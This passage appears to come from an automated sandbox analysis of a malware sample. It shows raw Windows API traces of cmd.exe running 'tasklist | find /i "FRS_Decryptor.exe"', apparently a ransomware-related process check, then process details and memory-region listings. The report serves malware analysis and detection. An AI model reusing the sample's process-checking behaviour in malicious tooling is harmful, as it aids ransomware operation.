lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf0f758*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf0f7a4 | out: lpCommandLine="tasklist", lpProcessInformation=0xf0f7a4*(hProcess=0x64, hThread=0x60, dwProcessId=0xb38, dwThreadId=0xad8)) returned 1 [0145.992] CloseHandle (hObject=0x60) returned 1 [0145.992] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0145.992] GetEnvironmentStringsW () returned 0xfb42d8* [0145.992] FreeEnvironmentStringsA (penv="=") returned 1 [0145.992] DeleteProcThreadAttributeList (in: lpAttributeList=0xf0f7d0 | out: lpAttributeList=0xf0f7d0) [0145.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0145.992] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0145.992] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0145.992] _close (_FileHandle=5) returned 0 [0145.993] _dup (_FileHandle=0) returned 4 [0145.993] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0145.993] _close (_FileHandle=3) returned 0 [0145.993] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0145.993] SetErrorMode (uMode=0x0) returned 0x0 [0145.993] SetErrorMode (uMode=0x1) returned 0x0 [0145.993] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfb42e0, lpFilePart=0xf0f874 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0f874*="Desktop") returned 0x1c [0145.993] SetErrorMode (uMode=0x0) returned 0x1 [0145.993] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.993] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.993] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.993] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xffffffff [0145.993] GetLastError () returned 0x2 [0145.994] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.994] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xfb5628 [0145.994] FindClose (in: hFindFile=0xfb5628 | out: hFindFile=0xfb5628) returned 1 [0145.994] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xffffffff [0145.994] GetLastError () returned 0x2 [0145.994] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xfb5628 [0145.994] FindClose (in: hFindFile=0xfb5628 | out: hFindFile=0xfb5628) returned 1 [0145.994] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.994] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.994] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0145.994] SetErrorMode (uMode=0x0) returned 0x0 [0145.994] SetErrorMode (uMode=0x1) returned 0x0 [0145.994] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfb4668, lpFilePart=0xf0f61c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0f61c*="Desktop") returned 0x1c [0145.994] SetErrorMode (uMode=0x0) returned 0x1 [0145.995] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.995] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.995] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.995] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.995] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xffffffff [0145.995] GetLastError () returned 0x2 [0145.995] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.995] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xfb04a0 [0145.995] FindClose (in: hFindFile=0xfb04a0 | out: hFindFile=0xfb04a0) returned 1 [0145.996] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xffffffff [0145.996] GetLastError () returned 0x2 [0145.996] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xfb04a0 [0145.996] FindClose (in: hFindFile=0xfb04a0 | out: hFindFile=0xfb04a0) returned 1 [0145.996] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.996] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.996] GetConsoleTitleW (in: lpConsoleTitle=0xf0f8a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0145.996] InitializeProcThreadAttributeList (in: lpAttributeList=0xf0f7d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf0f7b4 | out: lpAttributeList=0xf0f7d0, lpSize=0xf0f7b4) returned 1 [0145.996] UpdateProcThreadAttribute (in: lpAttributeList=0xf0f7d0, dwFlags=0x0, Attribute=0x60001, lpValue=0xf0f7bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf0f7d0, lpPreviousValue=0x0) returned 1 [0145.996] GetStartupInfoW (in: lpStartupInfo=0xf0f808 | out: lpStartupInfo=0xf0f808*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2e8, hStdError=0x2c)) [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0145.997] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0145.998] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0145.998] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf0f758*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf0f7a4 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xf0f7a4*(hProcess=0x60, hThread=0x54, dwProcessId=0x954, dwThreadId=0xac8)) returned 1 [0146.001] CloseHandle (hObject=0x54) returned 1 [0146.001] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.001] GetEnvironmentStringsW () returned 0xfbad78* [0146.001] FreeEnvironmentStringsA (penv="=") returned 1 [0146.001] DeleteProcThreadAttributeList (in: lpAttributeList=0xf0f7d0 | out: lpAttributeList=0xf0f7d0) [0146.001] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0146.001] _close (_FileHandle=4) returned 0 [0146.001] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0146.578] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xf0fb18 | out: lpExitCode=0xf0fb18*=0x0) returned 1 [0146.578] CloseHandle (hObject=0x64) returned 1 [0146.578] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0146.580] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xf0fb18 | out: lpExitCode=0xf0fb18*=0x0) returned 1 [0146.580] CloseHandle (hObject=0x60) returned 1 [0146.580] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0146.580] SetConsoleMode (hConsoleHandle=0x2e8, dwMode=0x0) returned 0 [0146.580] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0146.580] GetConsoleMode (in: hConsoleHandle=0x2e8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0146.580] _get_osfhandle (_FileHandle=0) returned 0x24 [0146.580] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0146.580] SetConsoleInputExeNameW () returned 0x1 [0146.581] GetConsoleOutputCP () returned 0x1b5 [0146.581] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0146.581] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.581] exit (_Code=0) Process: id = "164" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x110f4000" os_pid = "0xb38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "163" os_parent_pid = "0x4c8" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8353 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 8354 start_va = 0x550000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 8355 start_va = 0x570000 end_va = 0x571fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 8356 start_va = 0x580000 end_va = 0x58efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8357 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 8358 start_va = 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 8359 start_va = 0x610000 end_va = 0x613fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8360 start_va = 0x620000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 8361 start_va = 0x630000 end_va = 0x631fff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 8362 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8363 start_va = 0x7ee50000 end_va = 0x7ee72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee50000" filename = "" Region: id = 8364 start_va = 0x7ee74000 end_va = 0x7ee74fff entry_point = 0x0 region_type = private name = "private_0x000000007ee74000" filename = "" Region: id = 8365 start_va = 0x7ee7a000 end_va = 0x7ee7afff entry_point = 0x0 region_type = private name = "private_0x000000007ee7a000" filename = "" Region: id = 8366 start_va = 0x7ee7d000 end_va = 0x7ee7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee7d000" filename = "" Region: id = 8367 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8368 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8369 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8370 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8390 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8391 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8392 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8393 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8398 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 8399 start_va = 0x560000 end_va = 0x563fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 8400 start_va = 0x570000 end_va = 0x572fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 8401 start_va = 0x640000 end_va = 0x6bdfff entry_point = 0x640000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8402 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 8403 start_va = 0x6d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 8404 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 8405 start_va = 0x6f0000 end_va = 0x6f3fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8406 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 8407 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 8408 start_va = 0x730000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 8409 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 8410 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 8411 start_va = 0x810000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 8412 start_va = 0x910000 end_va = 0xa97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 8413 start_va = 0xaa0000 end_va = 0xc20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 8414 start_va = 0xc30000 end_va = 0x202ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 8415 start_va = 0x2030000 end_va = 0x2171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 8416 start_va = 0x2180000 end_va = 0x2454fff entry_point = 0x2180000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8417 start_va = 0x2460000 end_va = 0x285bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 8418 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 8419 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 8420 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 8421 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 8422 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 8423 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 8424 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 8425 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 8426 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 8427 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 8428 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 8429 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 8430 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 8431 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 8432 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8433 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 8434 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8435 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8436 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8437 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8438 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8439 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 8440 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8441 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 8442 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8443 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = 